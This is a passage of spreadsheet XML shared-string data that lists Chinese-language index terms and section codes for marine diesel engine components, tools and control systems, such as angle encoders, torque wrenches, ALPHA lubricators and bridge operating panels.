        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距浆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7055-0140 ECR.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动，正车，到车，定距浆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7055-0145 ESC.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距浆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7055-0150 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统原理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7055-0155 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵系统原理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7065-1100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度编码器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7065-1101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度编码器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7065-1200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供货安排</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7065-1201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器布置，数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7065-1202 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7072-0110 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧控制板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7072-0800 PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7072-1100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角度编码器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7072-1200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7072-1250 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>触发环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7640-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7645-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0201 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准拧紧力矩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0301 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0401 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拧紧表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉和螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓和螺母</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0601 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7665-0901 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0111 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0200 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0210 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0230 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7670-0230</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0240 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环长打扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0250 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭力扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7670-0250</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其他扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0260 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口扭力扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7670-0260</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>末端开口扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0300 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起重工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0310 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑车</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>7670-0310</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运送推车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0320 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环形吊索</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0400 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钳子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0410 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0450 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0600 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7670-0611 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扶梯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7940-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7972-0501 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵用配套元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">8240-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>831</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>833</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>838</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">8540-0100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交付</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">8840-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务信息</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>90°</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接件插头块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>90°</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镗孔连接件插头块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>903</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套面板上的工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>907</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套面板上的工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>911</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套面板上的工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">9140-0101 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供应商信息</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>926</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>93</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>94</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>A,B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ACU402A-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阿尔法控制装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ADM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ALCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ALCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>总线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ALPHA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子注油器生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>Alpha</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ALPHA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ALPHA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器试验装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>AMOT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>AP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>AP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>AVD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">AVM </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统，文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>AVM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警警及转系统规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>AVR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电压调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>a</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度管子弯头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>A-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>B&amp;W</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以外的增压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BANJO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BANJO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BANJO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联轴器，壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BANJO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Basler DECS 100 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BBC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器淡水冷却管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BLK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BLP-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥减负荷面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BM2-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BMP402A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥操作面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BMS402A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥操作面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>BM-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块</t>
    </r>
